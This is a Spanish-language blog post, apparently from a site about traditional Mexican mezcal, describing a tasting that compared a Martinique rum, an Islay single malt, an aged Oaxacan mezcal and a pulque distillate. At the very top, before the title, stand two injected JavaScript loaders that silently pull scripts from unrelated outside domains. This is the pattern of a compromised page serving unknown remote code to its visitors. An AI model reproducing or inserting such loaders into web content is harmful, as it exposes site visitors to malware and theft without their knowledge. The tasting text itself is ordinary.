;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Mezcales Tradicionales de los Pueblos de México » 89. Comparación de cuatro destilados

89. Comparación de cuatro destilados


El 16 de agosto la Logia de los Mezcólatras llevó a cabo una “Saboreada comparada de cuatro destilados”, cuyo primer requisito a cumplir era que tuvieran una riqueza alcohólica mínima o mayor a los 45 grados; segundo, que no se les filtraran aromas, o sea que no se les volviera insípidos; tercero, que no fueran pintados con colorantes ajenos a la bebida o a su proceso natural de elaboración. Los destilados escogidos fueron:
1. Ron agrícola blanco Dillon de Martinica a 55% alc. vol. Cuenta con Denominación de Origen Controlada o, como la llaman los franceses, Rhum agricole Apellation d’Origine Contrôlée Martinique (A.O.C). Pueden verse los detalles en www.rhums-dillon.com.
2. Whisky escocés Bruichladdich segunda edición, single malt, añejado 12 años en barrica de roble americano; fue elaborado en la isla de Islay, Escocia. El maestro destilador es Jim McEwan. Riqueza alcohólica: 46% alc. vol. Su etiqueta expresa que se envasa sin filtrar y sin colorear; el dato no deja de sorprender y preocupar, pues quiere decir, para ser precisos, que a la casi totalidad de bebedizos que se nos hacen pasar por whiskys se les filtran aromas y sabores y se les agregan colorantes. Puede revisarse su página en www.bruichladdich.com.
3. Mezcal Tradicional (MT) de maguey San Martinero de 13 años, elaborado en La Compañía, Ejutla, Oaxaca, por el maestro mezcalillero Gregorio Hernández en septiembre de 2008. Riqueza alcohólica: 54.4% alc.vol. Véase impreso.milenio.com/node/8694233.
4. Destilado de pulque de maguey Manso de la hacienda San Antonio Tochac, ubicada en los Llanos de Apan, Hidalgo. Riqueza alcohólica: 68.1% alc. vol.
Antes de saborearlos, cada uno de ellos fue venenciado; el único que no perleó fue el whisky, lo que desconcertó a los asistentes e hizo dudar de su calidad, aunque en boca presentó sabores interesantes pero una clara sensación de excesiva presencia del agua utilizada en su dilución.
Quien desee comparar dos MT, vaya a Red Fly el martes 23 a las 20 horas: Orizaba 145, Roma, DF.

http://impreso.milenio.com/node/9016046

Category: Milenio, Publicaciones

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *